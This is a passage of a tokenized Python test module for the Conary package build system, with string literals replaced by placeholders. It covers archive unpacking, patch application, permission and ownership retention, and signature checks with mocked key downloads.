'<STR_LIT>' , self . port ) , self . requestHandler ) <EOL> httpServer . serve_forever ( ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT> ) <EOL> def kill ( self ) : <EOL> if self . childPid == <NUM_LIT:0> : <EOL> return <EOL> os . kill ( self . childPid , <NUM_LIT:15> ) <EOL> pid , status = os . waitpid ( self . childPid , <NUM_LIT:0> ) <EOL> if not os . WIFSIGNALED ( status ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if os . WTERMSIG ( status ) != <NUM_LIT:15> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> os . WTERMSIG ( status ) ) <EOL> self . childPid = <NUM_LIT:0> <EOL> def url ( self ) : <EOL> return "<STR_LIT>" % self . port </s>
<s> from testrunner import decorators <EOL> import os <EOL> import stat <EOL> import shutil <EOL> import tempfile <EOL> from testrunner import testhelp <EOL> import SimpleHTTPServer <EOL> from conary import files , versions , rpmhelper <EOL> from conary import trove as trovemod <EOL> VFS = versions . VersionFromString <EOL> from conary . lib import log <EOL> from conary . lib import openpgpfile , util <EOL> from conary_test import rephelp <EOL> from conary . build import errors <EOL> from conary . build import lookaside <EOL> from conary . build import source <EOL> from conary_test import resources <EOL> from conary_test . cvctest . buildtest import policytest <EOL> class SourceTest ( rephelp . RepositoryHelper ) : <EOL> def testSourceManifest ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> repos = self . openRepository ( ) <EOL> for troveName , troveVersionString , troveFlavor in built : <EOL> for pathId , path , fileId , version , fileObj in repos . iterFilesInTrove ( <EOL> troveName , versions . VersionFromString ( troveVersionString ) , troveFlavor , <EOL> withFiles = True ) : <EOL> if '<STR_LIT>' in path or '<STR_LIT>' in path : <EOL> assert ( troveName == '<STR_LIT>' ) <EOL> elif '<STR_LIT>' in path : <EOL> assert ( troveName == '<STR_LIT>' ) <EOL> def testISOArchiveJoliet ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> trove = self . build ( recipestr , "<STR_LIT>" ) <EOL> repos = self . openRepository ( ) <EOL> paths = [ ] <EOL> for pathId , path , fileId , version , fileObj in repos . iterFilesInTrove ( <EOL> trove . getName ( ) , trove . getVersion ( ) , trove . getFlavor ( ) , <EOL> withFiles = True ) : <EOL> paths . append ( path ) <EOL> assert sorted ( paths ) == [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def testISOArchiveRockRidge ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> trove = self . build ( recipestr , "<STR_LIT>" ) <EOL> repos = self . openRepository ( ) <EOL> paths = [ ] <EOL> for pathId , path , fileId , version , fileObj in repos . iterFilesInTrove ( <EOL> trove . getName ( ) , trove . getVersion ( ) , trove . getFlavor ( ) , <EOL> withFiles = True ) : <EOL> paths . append ( path ) <EOL> assert sorted ( paths ) == [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testSourceTest1 ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> self . resetRepository ( ) <EOL> self . repos = self . openRepository ( ) <EOL> origDir = os . getcwd ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT>' ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> file ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> file ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> self . writeFile ( '<STR_LIT>' , recipestr ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . addfile ( '<STR_LIT>' , text = True ) <EOL> self . addfile ( '<STR_LIT>' , text = True ) <EOL> self . commit ( ) <EOL> os . chdir ( '<STR_LIT:..>' ) <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> os . chdir ( origDir ) <EOL> self . resetCache ( ) <EOL> realExists = os . path . exists <EOL> def access_xz ( * args ) : <EOL> if args [ <NUM_LIT:0> ] . endswith ( '<STR_LIT>' ) : <EOL> return False <EOL> return realExists ( * args ) <EOL> self . mock ( os . path , '<STR_LIT>' , access_xz ) <EOL> self . cookItem ( self . repos , self . cfg , '<STR_LIT>' , requireCleanSources = False ) <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testSourceTestUnlzma ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr = """<STR_LIT>""" <EOL> realExists = os . path . exists <EOL> def access_lzma ( * args ) : <EOL> if args [ <NUM_LIT:0> ] . endswith ( '<STR_LIT>' ) : <EOL> return False <EOL> return realExists ( * args ) <EOL> self . mock ( os . path , '<STR_LIT>' , access_lzma ) <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> assert '<STR_LIT>' in [ x [ <NUM_LIT:0> ] for x in built ] <EOL> def testSourceTestMissinglzma ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr = """<STR_LIT>""" <EOL> realExists = os . path . exists <EOL> def access_nolzma ( * args ) : <EOL> if args [ <NUM_LIT:0> ] . split ( os . sep ) [ - <NUM_LIT:1> ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return False <EOL> return realExists ( * args ) <EOL> self . mock ( os . path , '<STR_LIT>' , access_nolzma ) <EOL> self . assertRaises ( RuntimeError , self . buildRecipe , recipestr , <EOL> "<STR_LIT>" ) <EOL> def testUnpackOldRpm30 ( self ) : <EOL> destdir = os . path . join ( self . workDir , '<STR_LIT>' ) <EOL> util . mkdirChain ( destdir ) <EOL> rpmfile = os . path . join ( self . cfg . sourceSearchDir , '<STR_LIT>' ) <EOL> source . _extractFilesFromRPM ( rpmfile , directory = destdir ) <EOL> self . assertTrue ( os . path . exists ( util . joinPaths ( destdir , <EOL> '<STR_LIT>' ) ) ) <EOL> def testUnpackRPMWithUnsupportedTag ( self ) : <EOL> destdir = os . path . join ( self . workDir , '<STR_LIT>' ) <EOL> util . mkdirChain ( destdir ) <EOL> rpmfile = os . path . join ( self . cfg . sourceSearchDir , <EOL> '<STR_LIT>' ) <EOL> self . mock ( source , '<STR_LIT>' , <EOL> ( <EOL> ( '<STR_LIT>' , rpmhelper . SIG_SHA1 ) , <EOL> ( '<STR_LIT>' , rpmhelper . BLINKPKGID ) , <EOL> ( '<STR_LIT>' , rpmhelper . NAME ) , <EOL> ) ) <EOL> self . assertRaises ( source . SourceError , <EOL> source . _extractFilesFromRPM , rpmfile , directory = destdir ) <EOL> def testSourcePerms ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> self . logFilter . remove ( ) <EOL> self . logFilter . compare ( ( <EOL> '<STR_LIT>' <EOL> ) ) <EOL> def testSourceTestSRPMCache ( self ) : <EOL> """<STR_LIT>""" <EOL> recipe1 = """<STR_LIT>""" <EOL> recipe2 = """<STR_LIT>""" <EOL> self . resetRepository ( ) <EOL> self . repos = self . openRepository ( ) <EOL> self . resetWork ( ) <EOL> self . resetCache ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipe1 ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> self . resetWork ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . checkout ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipe2 ) <EOL> try : <EOL> self . commit ( ) <EOL> except IOError : <EOL> return <EOL> self . resetWork ( ) <EOL> self . resetCache ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . cookItem ( self . repos , self . cfg , '<STR_LIT:foo>' ) <EOL> def testSourceTestSigCheck ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> def mockedDownloadPublicKey ( slf ) : <EOL> if slf . keyid == '<STR_LIT>' : <EOL> f = file ( os . path . join ( resources . get_archive ( ) , '<STR_LIT>' ) ) <EOL> return openpgpfile . parseAsciiArmorKey ( f ) <EOL> raise source . SourceError ( "<STR_LIT>" % slf . keyid ) <EOL> self . mock ( source . _Source , '<STR_LIT>' , <EOL> mockedDownloadPublicKey ) <EOL> util . rmtree ( self . buildDir , ignore_errors = True ) <EOL> self . resetWork ( ) <EOL> self . logFilter . add ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> self . logFilter . remove ( ) <EOL> self . logFilter . compare ( ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) ) <EOL> recipestr2 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> self . assertRaises ( source . SourceError , self . buildRecipe , recipestr2 , <EOL> "<STR_LIT>" ) <EOL> def testSourceTestSigCheckFailedDownload ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> from conary . repository import transport <EOL> listcounter = [ ] <EOL> def mockedDoDownloadPublicKey ( slf , keyServer , lc = listcounter ) : <EOL> lc . append ( None ) <EOL> if len ( lc ) < <NUM_LIT:7> : <EOL> raise transport . TransportError ( "<STR_LIT>" ) <EOL> f = file ( os . path . join ( resources . get_archive ( ) , '<STR_LIT>' ) ) <EOL> data = openpgpfile . parseAsciiArmorKey ( f ) <EOL> return data <EOL> self . mock ( source . _Source , '<STR_LIT>' , <EOL> mockedDoDownloadPublicKey ) <EOL> util . rmtree ( self . buildDir , ignore_errors = True ) <EOL> self . resetWork ( ) <EOL> self . logFilter . add ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" , prep = True ) <EOL> self . logFilter . remove ( ) <EOL> self . assertEqual ( len ( listcounter ) , <NUM_LIT:7> ) <EOL> def testDontCheckKeyOfCommitedSource ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> listcounter = [ ] <EOL> def _checkSignature ( self , file ) : <EOL> listcounter . append ( None ) <EOL> return <EOL> self . mock ( source . _Source , '<STR_LIT>' , <EOL> _checkSignature ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT>' ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipestr1 ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> assert ( listcounter ) <EOL> listcounter [ : ] = [ ] <EOL> assert ( not listcounter ) <EOL> self . cookItem ( self . openRepository ( ) , self . cfg , '<STR_LIT>' , requireCleanSources = True ) <EOL> assert ( not listcounter ) <EOL> def testSourceTestApplyMacros ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> def testSourceApplyMacros2 ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , self . cfg . buildPath + '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> assert ( os . stat ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) ) [ stat . ST_MODE ] & <NUM_LIT:0> <NUM_LIT> == <NUM_LIT:0> <NUM_LIT> ) <EOL> def testPatchFilter ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . assertRaises ( source . SourceError , self . buildRecipe , recipestr , <EOL> '<STR_LIT>' ) <EOL> recipestr = """<STR_LIT>""" <EOL> self . buildRecipe ( recipestr , '<STR_LIT>' ) <EOL> def testAction ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> os . stat ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) ) <EOL> def findInFile ( self , filename , key ) : <EOL> f = open ( filename ) <EOL> contents = f . read ( ) <EOL> return contents . find ( key ) <EOL> def testAutoSourcePermissions ( self ) : <EOL> permsRecipe = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> self . resetRepository ( ) <EOL> self . repos = self . openRepository ( ) <EOL> origDir = os . getcwd ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:test>' ) <EOL> os . chdir ( '<STR_LIT:test>' ) <EOL> self . writeFile ( '<STR_LIT>' , permsRecipe ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> os . chdir ( '<STR_LIT:..>' ) <EOL> shutil . rmtree ( '<STR_LIT:test>' ) <EOL> os . chdir ( origDir ) <EOL> self . resetCache ( ) <EOL> self . cookItem ( self . repos , self . cfg , '<STR_LIT:test>' , requireCleanSources = False ) <EOL> def testAutoMainDir ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> recipestr2 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr2 , "<STR_LIT>" ) <EOL> recipestr3 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr3 , "<STR_LIT>" ) <EOL> recipestr4 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr4 , "<STR_LIT>" ) <EOL> def testAutoMainDirGuessFailure ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . assertRaises ( source . SourceError , self . buildRecipe , recipestr , <EOL> "<STR_LIT>" ) <EOL> def testSourceMagic ( self ) : <EOL> d = tempfile . mkdtemp ( ) <EOL> try : <EOL> shutil . copyfile ( resources . get_archive ( ) + '<STR_LIT>' , <EOL> d + '<STR_LIT>' ) <EOL> self . cfg . sourceSearchDir = d <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' ) <EOL> a . doAction ( ) <EOL> assert ( os . path . isdir ( r . macros . builddir + '<STR_LIT>' ) ) <EOL> assert ( os . path . isfile ( r . macros . builddir + '<STR_LIT>' ) ) <EOL> finally : <EOL> shutil . rmtree ( d ) <EOL> def testAddBadPatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> _returnException = True , logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:0> ] . __class__ != source . SourceError : <EOL> self . fail ( '<STR_LIT>' ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> def testAddGoodPatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> def testAddGoodLevel0Patch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> def testAddGoodButRejectedPatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> _returnException = True , logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> assert ( os . path . exists ( self . buildDir + '<STR_LIT>' ) ) <EOL> def testAddPartiallyApplicablePatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> _returnException = True , logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> assert ( '<STR_LIT>' not in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> assert ( '<STR_LIT>' in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> def testPatchSameFileTwiceInOnePatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> assert ( '<STR_LIT>' in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> recipestr1 = recipestr1 . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> shutil . rmtree ( self . buildDir + '<STR_LIT>' ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> assert ( '<STR_LIT>' in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> def testLargePatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . assertRaises ( source . SourceError , self . captureOutput , <EOL> self . buildRecipe , <EOL> recipestr1 , "<STR_LIT>" ) <EOL> def testMissingPatchProgram ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> self . assertRaises ( source . SourceError , <EOL> self . buildRecipe , recipestr , "<STR_LIT>" ) <EOL> self . logFilter . remove ( ) <EOL> self . logFilter . compare ( [ <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def testTarPermissions ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> sb = os . stat ( r . macros . destdir + '<STR_LIT>' ) <EOL> assert ( sb . st_mode & stat . S_IWGRP ) <EOL> def testDeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> self . assertTrue ( os . path . islink ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> def testBzipDeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testLZMADeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> def testBzipDebControl ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , debArchive = '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> def testEmptyDeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> self . assertRaises ( source . SourceError , a . doAction ) <EOL> def testAllPermissionsRetention ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> trvInfo = ( built [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , VFS ( built [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) , built [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] ) <EOL> repos = self . openRepository ( ) <EOL> cs = repos . createChangeSet ( <EOL> [ ( trvInfo [ <NUM_LIT:0> ] , ( None , None ) , ( trvInfo [ <NUM_LIT:1> ] , trvInfo [ <NUM_LIT:2> ] ) , True ) ] ) <EOL> trvCs = cs . getNewTroveVersion ( * trvInfo ) <EOL> trv = trovemod . Trove ( trvCs ) <EOL> actual = { } <EOL> for pathId , path , fileId , version in trv . iterFileList ( ) : <EOL> stream = cs . getFileChange ( None , fileId ) <EOL> fObj = files . ThawFile ( stream , pathId ) <EOL> actual [ path ] = ( fObj . inode . owner ( ) , <EOL> fObj . inode . group ( ) , <EOL> fObj . inode . permsString ( ) ) <EOL> expected = { <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> } <EOL> if actual != expected : <EOL> l = [ ] <EOL> extra = sorted ( list ( set ( actual . keys ( ) ) - set ( expected . keys ( ) ) ) ) <EOL> for m in extra : <EOL> l . append ( '<STR_LIT>' % m ) <EOL> for path in actual . keys ( ) : <EOL> if path in expected and actual [ path ] != expected [ path ] : <EOL> l . append ( '<STR_LIT>' <EOL> % ( ( path , ) + expected [ path ] + actual [ path ] ) ) <EOL> missing = sorted ( list ( set ( expected . keys ( ) ) - set ( actual . keys ( ) ) ) ) <EOL> for m in missing : <EOL> l . append ( '<STR_LIT>' % m ) <EOL> msg = '<STR_LIT:\n>' . join ( l ) <EOL> self . fail ( msg ) <EOL> def testOwnershipRetention ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> trvInfo = ( built [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , VFS ( built [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) , built [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] ) <EOL> repos = self . openRepository ( ) <EOL> cs = repos . createChangeSet ( <EOL> [ ( trvInfo [ <NUM_LIT:0> ] , ( None , None ) , ( trvInfo [ <NUM_LIT:1> ] , trvInfo [ <NUM_LIT:2> ] ) , True ) ] ) <EOL> trvCs = cs . getNewTroveVersion ( * trvInfo ) <EOL> trv = trovemod . Trove ( trvCs ) <EOL> actual = { } <EOL> for pathId , path , fileId , version in trv . iterFileList ( ) : <EOL> stream = cs . getFileChange ( None , fileId ) <EOL> fObj = files . ThawFile ( stream , pathId ) <EOL> actual [ path ] = ( fObj . inode . owner ( ) , fObj . inode . group ( ) ) <EOL> expected = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> if actual != expected : <EOL> l = [ ] <EOL> for path in actual . keys ( ) : <EOL> if actual [ path ] != expected [ path ] : <EOL> l . append ( '<STR_LIT>' <EOL> % ( ( path , ) + expected [ path ] + actual [ path ] ) ) <EOL> msg = '<STR_LIT:\n>' . join ( l ) <EOL> self . fail ( msg ) <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> @ decorators . requireBinary ( 